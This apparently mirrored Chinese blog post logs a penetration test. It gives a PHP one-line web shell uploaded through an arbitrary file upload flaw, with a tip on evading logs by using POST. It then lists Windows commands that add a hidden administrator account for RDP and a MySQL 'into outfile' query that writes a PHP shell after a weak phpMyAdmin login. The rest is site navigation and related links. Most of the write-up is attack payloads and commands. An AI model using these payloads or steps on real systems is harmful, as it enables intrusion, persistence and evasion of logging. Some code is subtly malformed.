zoukankan      html  css  js  c++  java
  • 记录一次渗透测试全过程

    一、信息收集:

      1、巡风扫漏洞看到一个80端口开放,上去看一看,任意文件上传。

      2、巡风扫漏洞还看到一个phpmyadmin弱口令,版本很老。

    二、任意文件上传:

      1、上传php文件: 

    <?php @system($_GET("cmd")) ?>
    /*
        合理合法过程要接受检查,不然还是传post,默认不记日志
        上传路径在下载页面可以爆出来,直接访问可以解析
    */

      2、可以菜刀直接连了,或者我这里增加了一个账户

    1 net user test test /add
    2 net localgroup administrators test /add 
    3 /*加入管理员,可以3389*/

      3、3389连上去:发现改机器被别人搞过:套路都一样。查日志post的,没操作。就能查到一个IP。根据网络安全监控设备日志查到归属人。

      4、另外一个弱口令登进去,mysql写一句话

    1 select "<?php system("cmd") ?>" into outfile "/mainpath/test.php";

      5、菜刀连接。开启了安全模式,php很多函数执行不了。郁闷!

  • 相关阅读:
    所有者权益
    金融工具
    或有事项
    股份支付
    借款费用
    Keycode对照表
    js(jQuery)获取时间搜集
    jQuery实现CheckBox全选、全不选
    JS 截取字符串函数
    jQuery mouseenter与mouseleave
  • 原文地址:https://www.cnblogs.com/KevinGeorge/p/8059736.html
Copyright © 2011-2022 走看看